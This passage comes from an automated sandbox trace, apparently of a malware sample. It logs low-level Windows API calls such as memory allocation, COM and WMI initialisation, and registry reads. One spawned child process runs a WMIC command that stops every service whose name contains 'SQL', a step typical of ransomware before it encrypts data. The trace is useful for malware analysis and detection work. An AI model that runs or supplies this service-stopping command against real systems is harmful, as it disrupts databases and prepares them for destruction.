(_Block=0x2b3ae10) [0284.777] free (_Block=0x2b3bc48) [0284.777] free (_Block=0x2b3bc08) [0284.777] free (_Block=0x2b3ae70) [0284.777] free (_Block=0x2b3ae58) [0284.777] free (_Block=0x2b3ae28) [0284.777] free (_Block=0x2b3bbd8) [0284.777] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0284.777] free (_Block=0x2b3b0f0) [0284.777] free (_Block=0x2b3abd0) [0284.777] free (_Block=0x2b30568) [0284.777] free (_Block=0x2b3ad98) [0284.777] free (_Block=0x2b3b1c8) [0284.777] free (_Block=0x2b3ab40) [0284.777] free (_Block=0x2b32d40) [0284.777] free (_Block=0x2b326b0) [0284.777] free (_Block=0x2b326f8) [0284.777] free (_Block=0x2b32740) [0284.777] free (_Block=0x2b3ae40) [0284.777] free (_Block=0x2b327c8) [0284.777] free (_Block=0x2b30508) [0284.778] free (_Block=0x2b32d00) [0284.778] free (_Block=0x2b304f0) [0284.778] free (_Block=0x2b32ce0) [0284.778] free (_Block=0x2b304d8) [0284.778] free (_Block=0x2b329a0) [0284.778] free (_Block=0x2b32908) [0284.778] free (_Block=0x2b32920) [0284.778] free (_Block=0x2b328d0) [0284.778] free (_Block=0x2b328e8) [0284.778] free (_Block=0x2b32940) [0284.778] free (_Block=0x2b32958) [0284.778] free (_Block=0x2b304a0) [0284.778] free (_Block=0x2b304b8) [0284.778] free (_Block=0x2b32860) [0284.778] free (_Block=0x2b32878) [0284.778] free (_Block=0x2b32828) [0284.778] free (_Block=0x2b32840) [0284.778] free (_Block=0x2b32898) [0284.778] free (_Block=0x2b328b0) [0284.778] free (_Block=0x2b327f0) [0284.778] free (_Block=0x2b32808) [0284.778] free (_Block=0x2b327a0) [0284.778] free (_Block=0x2b31200) [0284.778] free (_Block=0x2b3afd0) [0284.778] WbemLocator:IUnknown:Release (This=0x2db4838) returned 0x2 [0284.779] WbemLocator:IUnknown:Release (This=0x2dbaca0) returned 0x0 [0284.779] WbemLocator:IUnknown:Release (This=0x2db4838) returned 0x1 [0284.779] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0284.779] WbemLocator:IUnknown:Release (This=0x2db4838) returned 0x0 [0284.779] free (_Block=0x2b3adf8) [0284.780] free (_Block=0x2b3acf0) [0284.780] free (_Block=0x2b32ac0) [0284.780] free (_Block=0x2b3aba0) [0284.780] free (_Block=0x2b3ab10) [0284.780] free (_Block=0x2b32b60) [0284.780] free (_Block=0x2b3ab58) [0284.780] free (_Block=0x2b3ab88) [0284.780] free (_Block=0x2b32c80) [0284.780] free (_Block=0x2b3ad38) [0284.780] free (_Block=0x2b3ac18) [0284.780] free (_Block=0x2b32d20) [0284.780] free (_Block=0x2b3adb0) [0284.780] free (_Block=0x2b3ab70) [0284.780] free (_Block=0x2b32a20) [0284.780] free (_Block=0x2b3aca8) [0284.780] free (_Block=0x2b3ab28) [0284.780] free (_Block=0x2b32a40) [0284.780] free (_Block=0x2b3ac00) [0284.780] free (_Block=0x2b3ac78) [0284.780] free (_Block=0x2b32aa0) [0284.780] free (_Block=0x2b3acd8) [0284.780] free (_Block=0x2b3acc0) [0284.780] free (_Block=0x2b32b40) [0284.781] free (_Block=0x2b39808) [0284.781] free (_Block=0x2b3ac48) [0284.781] free (_Block=0x2b329e0) [0284.781] free (_Block=0x2b3ac90) [0284.781] free (_Block=0x2b3ac30) [0284.781] free (_Block=0x2b32b00) [0284.781] free (_Block=0x2b3ade0) [0284.781] free (_Block=0x2b3adc8) [0284.781] free (_Block=0x2b32b20) [0284.781] free (_Block=0x2b3ac60) [0284.781] free (_Block=0x2b3abb8) [0284.781] free (_Block=0x2b32a80) [0284.781] free (_Block=0x2b39898) [0284.781] free (_Block=0x2b398b0) [0284.781] free (_Block=0x2b32b80) [0284.781] free (_Block=0x2b39910) [0284.781] free (_Block=0x2b39928) [0284.781] free (_Block=0x2b329c0) [0284.781] free (_Block=0x2b398f8) [0284.781] free (_Block=0x2b39868) [0284.781] free (_Block=0x2b32a60) [0284.781] free (_Block=0x2b399a0) [0284.781] free (_Block=0x2b39958) [0284.781] free (_Block=0x2b32a00) [0284.781] free (_Block=0x2b39970) [0284.781] free (_Block=0x2b399b8) [0284.782] free (_Block=0x2b32ba0) [0284.782] free (_Block=0x2b39850) [0284.782] free (_Block=0x2b398c8) [0284.782] free (_Block=0x2b32ae0) [0284.782] free (_Block=0x2b39820) [0284.782] free (_Block=0x2b39988) [0284.782] free (_Block=0x2b32d60) [0284.782] free (_Block=0x2b39880) [0284.782] free (_Block=0x2b39940) [0284.782] free (_Block=0x2b32c20) [0284.782] free (_Block=0x2b39838) [0284.782] free (_Block=0x2b397f0) [0284.782] free (_Block=0x2b32bc0) [0284.782] CoUninitialize () [0284.847] exit (_Code=0) [0284.847] free (_Block=0x2b3aee8) [0284.848] free (_Block=0x2b31008) [0284.848] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0284.848] free (_Block=0x2b32e10) [0284.848] free (_Block=0x2b327e0) [0284.848] free (_Block=0x2b30fe8) [0284.848] free (_Block=0x2b30fc8) [0284.848] free (_Block=0x2b30f98) [0284.848] free (_Block=0x2b30f78) [0284.848] free (_Block=0x2b30f48) [0284.848] free (_Block=0x2b30f08) [0284.849] free (_Block=0x2b30ee8) [0284.849] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0284.849] free (_Block=0x2b32c60) Thread: id = 246 os_tid = 0x1108 Thread: id = 247 os_tid = 0x120c Thread: id = 248 os_tid = 0xef0 Thread: id = 249 os_tid = 0xee8 Process: id = "20" image_name = "wmic.exe" filename = "c:\\windows\\syswow64\\wbem\\wmic.exe" page_root = "0x21853000" os_pid = "0xe98" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x13b8" cmd_line = "\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%SQL%%'\" call stopservice" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 251 os_tid = 0x4e4 [0285.101] GetModuleHandleA (lpModuleName=0x0) returned 0xa20000 [0285.102] __set_app_type (_Type=0x1) [0285.102] __p__fmode () returned 0x776f3c14 [0285.102] __p__commode () returned 0x776f49ec [0285.102] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xa59af0) returned 0x0 [0285.102] __wgetmainargs (in: _Argc=0xa681a8, _Argv=0xa681ac, _Env=0xa681b0, _DoWildCard=0, _StartInfo=0xa681bc | out: _Argc=0xa681a8, _Argv=0xa681ac, _Env=0xa681b0) returned 0 [0285.103] ??0CHString@@QAE@XZ () returned 0xa685ec [0285.103] malloc (_Size=0x18) returned 0x2da0ed8 [0285.103] malloc (_Size=0x38) returned 0x2da0ef8 [0285.103] malloc (_Size=0x28) returned 0x2da0f38 [0285.103] malloc (_Size=0x18) returned 0x2da0f68 [0285.103] malloc (_Size=0x24) returned 0x2da0f88 [0285.103] malloc (_Size=0x18) returned 0x2da0fb8 [0285.103] malloc (_Size=0x18) returned 0x2da0fd8 [0285.103] ??0CHString@@QAE@XZ () returned 0xa688fc [0285.103] malloc (_Size=0x18) returned 0x2da0ff8 [0285.103] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0285.103] SetConsoleCtrlHandler (HandlerRoutine=0xa53cc0, Add=1) returned 1 [0285.104] _onexit (_Func=0xa5f370) returned 0xa5f370 [0285.104] _onexit (_Func=0xa5f380) returned 0xa5f380 [0285.104] _onexit (_Func=0xa5f390) returned 0xa5f390 [0285.167] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0285.168] ResolveDelayLoadedAPI () returned 0x74a22590 [0285.168] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0285.173] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0285.184] CoCreateInstance (in: rclsid=0xa26a74*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xa26a84*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xa68510 | out: ppv=0xa68510*=0x2b147f8) returned 0x0 [0285.210] GetCurrentProcess () returned 0xffffffff [0285.210] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x87fc28 | out: TokenHandle=0x87fc28*=0x194) returned 1 [0285.210] GetTokenInformation (in: TokenHandle=0x194, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x87fc24 | out: TokenInformation=0x0, ReturnLength=0x87fc24) returned 0 [0285.210] malloc (_Size=0x118) returned 0x2da26b0 [0285.210] GetTokenInformation (in: TokenHandle=0x194, TokenInformationClass=0x3, TokenInformation=0x2da26b0, TokenInformationLength=0x118, ReturnLength=0x87fc24 | out: TokenInformation=0x2da26b0, ReturnLength=0x87fc24) returned 1 [0285.210] AdjustTokenPrivileges (in: TokenHandle=0x194, DisableAllPrivileges=0, NewState=0x2da26b0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0285.210] free (_Block=0x2da26b0) [0285.210] CloseHandle (hObject=0x194) returned 1 [0285.210] malloc (_Size=0x40) returned 0x2da26b0 [0285.211] malloc (_Size=0x40) returned 0x2da26f8 [0285.211] malloc (_Size=0x40) returned 0x2da2740 [0285.211] SetThreadUILanguage (LangId=0x0) returned 0x7b0409 [0285.215] _vsnwprintf (in: _Buffer=0x2da2740, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x87fbb0 | out: _Buffer="ms_409") returned 6 [0285.215] malloc (_Size=0x20) returned 0x2da11f0 [0285.215] GetComputerNameW (in: lpBuffer=0x2da11f0, nSize=0x87fc14 | out: lpBuffer="NQDPDE", nSize=0x87fc14) returned 1 [0285.215] lstrlenW (lpString="NQDPDE") returned 6 [0285.215] malloc (_Size=0xe) returned 0x2da2788 [0285.215] lstrlenW (lpString="NQDPDE") returned 6 [0285.215] ResolveDelayLoadedAPI () returned 0x7444db00 [0285.215] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x87fc28 | out: lpNameBuffer=0x0, nSize=0x87fc28) returned 0x7b5000 [0285.217] GetLastError () returned 0xea [0285.217] malloc (_Size=0x1e) returned 0x2da27a0 [0285.217] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2da27a0, nSize=0x87fc28 | out: lpNameBuffer="NQDPDE\\FD1HVy", nSize=0x87fc28) returned 0x1 [0285.217] lstrlenW (lpString="") returned 0 [0285.218] lstrlenW (lpString="NQDPDE") returned 6 [0285.218] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0285.219] lstrlenW (lpString=".") returned 1 [0285.219] lstrlenW (lpString="NQDPDE") returned 6 [0285.219] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2=".", cchCount2=1) returned 3 [0285.219] lstrlenW (lpString="LOCALHOST") returned 9 [0285.219] lstrlenW (lpString="NQDPDE") returned 6 [0285.219] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="LOCALHOST", cchCount2=9) returned 3 [0285.219] lstrlenW (lpString="NQDPDE") returned 6 [0285.219] lstrlenW (lpString="NQDPDE") returned 6 [0285.219] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="NQDPDE", cchCount2=6) returned 2 [0285.219] free (_Block=0x2da2788) [0285.219] lstrlenW (lpString="NQDPDE") returned 6 [0285.219] malloc (_Size=0xe) returned 0x2da2788 [0285.220] lstrlenW (lpString="NQDPDE") returned 6 [0285.220] lstrlenW (lpString="NQDPDE") returned 6 [0285.220] malloc (_Size=0xe) returned 0x2da27c8 [0285.220] lstrlenW (lpString="NQDPDE") returned 6 [0285.220] malloc (_Size=0x4) returned 0x2da1218 [0285.220] malloc (_Size=0xc) returned 0x2da27e0 [0285.220] ResolveDelayLoadedAPI () returned 0x7745b870 [0285.230] malloc (_Size=0x18) returned 0x2da27f8 [0285.230] malloc (_Size=0xc) returned 0x2da2818 [0285.230] SysStringLen (param_1="IDENTIFY") returned 0x8 [0285.230] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0285.230] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0285.230] SysStringLen (param_1="IDENTIFY") returned 0x8 [0285.230] malloc (_Size=0x18) returned 0x2da2830 [0285.230] malloc (_Size=0xc) returned 0x2da2850 [0285.230] SysStringLen (param_1="IMPERSONATE") returned 0xb [0285.230] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0285.230] SysStringLen (param_1="IMPERSONATE") returned 0xb [0285.230] SysStringLen (param_1="IDENTIFY") returned 0x8 [0285.230] SysStringLen (param_1="IDENTIFY") returned 0x8 [0285.230] SysStringLen (param_1="IMPERSONATE") returned 0xb [0285.230] malloc (_Size=0x18) returned 0x2da2868 [0285.230] malloc (_Size=0xc) returned 0x2da2888 [0285.230] SysStringLen (param_1="DELEGATE") returned 0x8 [0285.230] SysStringLen (param_1="IDENTIFY") returned 0x8 [0285.230] SysStringLen (param_1="DELEGATE") returned 0x8 [0285.230] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0285.230] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0285.230] SysStringLen (param_1="DELEGATE") returned 0x8 [0285.230] malloc (_Size=0x18) returned 0x2da28a0 [0285.230] malloc (_Size=0xc) returned 0x2da28c0 [0285.230] malloc (_Size=0x18) returned 0x2da28d8 [0285.231] malloc (_Size=0xc) returned 0x2da28f8 [0285.231] SysStringLen (param_1="NONE") returned 0x4 [0285.231] SysStringLen (param_1="DEFAULT") returned 0x7 [0285.231] SysStringLen (param_1="DEFAULT") returned 0x7 [0285.231] SysStringLen (param_1="NONE") returned 0x4 [0285.231] malloc (_Size=0x18) returned 0x2da2910 [0285.231] malloc (_Size=0xc) returned 0x2da2930 [0285.231] SysStringLen (param_1="CONNECT") returned 0x7 [0285.231] SysStringLen (param_1="DEFAULT") returned 0x7 [0285.231] malloc (_Size=0x18) returned 0x2da2948 [0285.231] malloc (_Size=0xc) returned 0x2da04a0 [0285.232] SysStringLen (param_1="CALL") returned 0x4 [0285.232] SysStringLen (param_1="DEFAULT") returned 0x7 [0285.232] SysStringLen (param_1="CALL") returned 0x4 [0285.232] SysStringLen (param_1="CONNECT") returned 0x7 [0285.232] malloc (_Size=0x18) returned 0x2da04b8 [0285.232] malloc (_Size=0xc) returned 0x2da04d8 [0285.232] SysStringLen (param_1="PKT") returned 0x3 [0285.232] SysStringLen (param_1="DEFAULT") returned 0x7 [0285.232] SysStringLen (param_1="PKT") returned 0x3 [0285.232] SysStringLen (param_1="NONE") returned 0x4 [0285.232] SysStringLen (param_1="NONE") returned 0x4 [0285.232] SysStringLen (param_1="PKT") returned 0x3 [0285.232] malloc (_Size=0x18) returned 0x2da2bf0 [0285.232] malloc (_Size=0xc) returned 0x2da04f0 [0285.232] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0285.232] SysStringLen (param_1="DEFAULT") returned 0x7 [0285.232] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0285.232] SysStringLen (param_1="NONE") returned 0x4 [0285.232] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0285.232] SysStringLen (param_1="PKT") returned 0x3 [0285.232] SysStringLen (param_1="PKT") returned 0x3 [0285.232] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0285.232] malloc (_Size=0x18) returned 0x2da2c90 [0285.232] malloc (_Size=0xc) returned 0x2da0508 [0285.232] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0285.232] SysStringLen (param_1="DEFAULT") returned 0x7 [0285.232] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0285.232] SysStringLen (param_1="PKT") returned 0x3 [0285.233] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0285.233] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0285.233] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0285.233] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0285.233] malloc (_Size=0x18) returned 0x2da2b10 [0285.233] malloc (_Size=0x40) returned 0x2da0520 [0285.233] malloc (_Size=0x20a) returned 0x2da97c8 [0285.233] GetSystemDirectoryW (in: lpBuffer=0x2da97c8, uSize=0x105 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0285.233] free (_Block=0x2da97c8) [0285.233] malloc (_Size=0xc) returned 0x2da0568 [0285.233] malloc (_Size=0xc) returned 0x2da0580 [0285.233] malloc (_Size=0xc) returned 0x2da2d70 [0285.233] SysStringLen (param_1="C:\\WINDOWS\\system32") returned 0x13 [0285.233] SysStringLen (param_1="\\wbem\\") returned 0x6 [0285.233] free (_Block=0x2da0568) [0285.233] free (_Block=0x2da0580) [0285.233] SysStringByteLen (bstr="C:\\WINDOWS\\system32\\wbem\\") returned 0x32 [0285.233] free (_Block=0x2da2d70) [0285.234] malloc (_Size=0xc) returned 0x2da9898 [0285.234] malloc (_Size=0xc) returned 0x2da9838 [0285.234] malloc (_Size=0xc) returned 0x2da9928 [0285.234] SysStringLen (param_1="C:\\WINDOWS\\system32\\wbem\\") returned 0x19 [0285.234] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0285.234] free (_Block=0x2da9898) [0285.234] free (_Block=0x2da9838) [0285.234] GetCurrentThreadId () returned 0x4e4 [0285.234] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x87f738 | out: phkResult=0x87f738*=0x1a0) returned 0x0 [0285.234] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x87f744, lpcbData=0x87f740*=0x400 | out: lpType=0x0, lpData=0x87f744*=0x30, lpcbData=0x87f740*=0x4) returned 0x0 [0285.234] _wcsicmp (_String1="0", _String2="1") returned -1 [0285.234] _wcsicmp (_String1="0", _String2="2") returned -2 [0285.234] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x87f740*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x87f740*=0x42) returned 0x0 [0285.234] malloc (_Size=0x86) returned 0x2da2d70 [0285.234] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x2da2d70, lpcbData=0x87f740*=0x42 | out: lpType=0x0, lpData=0x2da2d70*=0x25, lpcbData=0x87f740*=0x42) returned 0x0 [0285.234] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0285.235] malloc (_Size=0x42) returned 0x2da2e00 [0285.235] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0285.235] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x87f744, lpcbData=0x87f740*=0x400 | out: lpType=0x0, lpData=0x87f744*=0x36, lpcbData=0x87f740*=0xc) returned 0x0 [0285.235] _wtol (_String="65536") returned 65536 [0285.235] free (_Block=0x2da2d70) [0285.235] RegCloseKey (hKey=0x0) returned 0x6 [0285.235] CoCreateInstance (in: rclsid=0xa26ad4*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xa26ae4*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x87fbd4 | out: ppv=0x87fbd4*=0x2cd45a8) returned 0x0 [0285.256] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x2cd45a8, xmlSource=0x87fb58*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\WINDOWS\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0x87fbc0 | out: isSuccessful=0x87fbc0*=0xffff) returned 0x0 [0285.381] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x2cd45a8, DOMElement=0x87fbd0 | out: DOMElement=0x87fbd0*=0x2cd6b48) returned 0x0 [0285.382] malloc (_Size=0xc) returned 0x2da9838 [0285.382] IXMLDOMElement:getElementsByTagName (in: This=0x2cd6b48, tagName="XSLFORMAT", resultList=0x87fbcc | out: resultList=0x87fbcc*=0x2cd9ca0) returned 0x0 [0285.383] free (_Block=0x2da9838) [0285.383] IXMLDOMNodeList:get_length (in: This=0x2cd9ca0, listLength=0x87fbc8 | out: listLength=0x87fbc8*=21) returned 0x0 [0285.384] IXMLDOMNodeList:get_item (in: This=0x2cd9ca0, index=0, listItem=0x87fbe8 | out: listItem=0x87fbe8*=0x2cd6b88) returned 0x0 [0285.384] IXMLDOMNode:get_text (in: This=0x2cd6b88, text=0x87fbec | out: text=0x87fbec*="texttable.xsl") returned 0x0 [0285.384] IXMLDOMNode:get_attributes (in: This=0x2cd6b88, attributeMap=0x87fbe4 | out: attributeMap=0x87fbe4*=0x2cd9fa8) returned 0x0 [0285.385] malloc (_Size=0xc) returned 0x2da9958 [0285.385] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2cd9fa8, name="KEYWORD", namedItem=0x87fbe0 | out: namedItem=0x87fbe0*=0x2cd9ff8) returned 0x0 [0285.385] free (_Block=0x2da9958) [0285.385] IXMLDOMNode:get_nodeValue (in: This=0x2cd9ff8, value=0x87fba0 | out: value=0x87fba0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x0)) returned 0x0 [0285.385] malloc (_Size=0xc) returned 0x2da9880 [0285.385] malloc (_Size=0xc) returned 0x2da98f8 [0285.385] malloc (_Size=0x18) returned 0x2da2d50 [0285.386] IUnknown:Release (This=0x2cd6b88) returned 0x0 [0285.386] IUnknown:Release (This=0x2cd9fa8) returned 0x0 [0285.386] IUnknown:Release (This=0x2cd9ff8) returned 0x0 [0285.386] IXMLDOMNodeList:get_item (in: This=0x2cd9ca0, index=1, listItem=0x87fbe8 | out: listItem=0x87fbe8*=0x2cd6b88) returned 0x0 [0285.387] IXMLDOMNode:get_text (in: This=0x2cd6b88, text=0x87fbec | out: text=0x87fbec*="textvaluelist.xsl") returned 0x0 [0285.387] IXMLDOMNode:get_attributes (in: This=0x2cd6b88, attributeMap=0x87fbe4 | out: attributeMap=0x87fbe4*=0x2cd9fa8) returned 0x0 [0285.387] malloc (_Size=0xc) returned 0x2da9940 [0285.387] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2cd9fa8, name="KEYWORD", namedItem=0x87fbe0 | out: namedItem=0x87fbe0*=0x2cd9ff8) returned 0x0 [0285.387] free (_Block=0x2da9940) [0285.387] IXMLDOMNode:get_nodeValue (in: This=0x2cd9ff8, value=0x87fba0 | out: value=0x87fba0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x0)) returned 0x0 [0285.387] malloc (_Size=0xc) returned 0x2da99a0 [0285.387] malloc (_Size=0xc) returned 0x2da99b8 [0285.387] SysStringLen (param_1="VALUE") returned 0x5 [0285.387] SysStringLen (param_1="TABLE") returned 0x5 [0285.387] SysStringLen (param_1="TABLE") returned 0x5 [0285.387] SysStringLen (param_1="VALUE") returned 0x5 [0285.388] malloc (_Size=0x18) returned 0x2da2b30 [0285.388] IUnknown:Release (This=0x2cd6b88) returned 0x0 [0285.388] IUnknown:Release (This=0x2cd9fa8) returned 0x0 [0285.388] IUnknown:Release (This=0x2cd9ff8) returned 0x0 [0285.388] IXMLDOMNodeList:get_item (in: This=0x2cd9ca0, index=2, listItem=0x87fbe8 | out: listItem=0x87fbe8*=0x2cd6b88) returned 0x0 [0285.388] IXMLDOMNode:get_text (in: This=0x2cd6b88, text=0x87fbec | out: text=0x87fbec*="textvaluelist.xsl") returned 0x0 [0285.388] IXMLDOMNode:get_attributes (in: This=0x2cd6b88, attributeMap=0x87fbe4 | out: attributeMap=0x87fbe4*=0x2cd9fa8) returned 0x0 [0285.388] malloc (_Size=0xc) returned 0x2da9898 [0285.388] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2cd9fa8, name="KEYWORD", namedItem=0x87fbe0 | out: namedItem=0x87fbe0*=0x2cd9ff8) returned 0x0 [0285.388] free (_Block=0x2da9898) [0285.388] IXMLDOMNode:get_nodeValue (in: This=0x2cd9ff8, value=0x87fba0 | out: value=0x87fba0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x0)) returned 0x0 [0285.388] malloc (_Size=0xc) returned 0x2da9850 [0285.388] malloc (_Size=0xc) returned 0x2da9898 [0285.389] SysStringLen (param_1="LIST") returned 0x4 [0285.389] SysStringLen (param_1="TABLE") returned 0x5 [0285.389] malloc (_Size=0x18) returned 0x2da2cf0 [0285.389] IUnknown:Release (This=0x2cd6b88) returned 0x0 [0285.389] IUnknown:Release (This=0x2cd9fa8) returned 0x0 [0285.389] IUnknown:Release (This=0x2cd9ff8) returned 0x0 [0285.389] IXMLDOMNodeList:get_item (in: This=0x2cd9ca0, index=3, listItem=0x87fbe8 | out: listItem=0x87fbe8*=0x2cd6b88) returned 0x0 [0285.389] IXMLDOMNode:get_text (in: This=0x2cd6b88, text=0x87fbec | out: text=0x87fbec*="rawxml.xsl") returned 0x0 [0285.389] IXMLDOMNode:get_attributes (in: This=0x2cd6b88, attributeMap=0x87fbe4 | out: attributeMap=0x87fbe4*=0x2cd9fa8) returned 0x0 [0285.389] malloc (_Size=0xc) returned 0x2da9820 [0285.389] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2cd9fa8, name="KEYWORD", namedItem=0x87fbe0 | out: namedItem=0x87fbe0*=0x2cd9ff8) returned 0x0 [0285.389] free (_Block=0x2da9820) [0285.389] IXMLDOMNode:get_nodeValue (in: This=0x2cd9ff8, value=0x87fba0 | out: value=0x87fba0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x0)) returned 0x0 [0285.390] malloc (_Size=0xc) returned 0x2da9808 [0285.390] malloc (_Size=0xc) returned 0x2da98b0 [0285.390] SysStringLen (param_1="RAWXML") returned 0x6 [0285.390] SysStringLen (param_1="TABLE") returned 0x5 [0285.390] SysStringLen (param_1="RAWXML") returned 0x6 [0285.390] SysStringLen (param_1="LIST") returned 0x4 [0285.390] SysStringLen (param_1="LIST") returned 0x4 [0285.390] 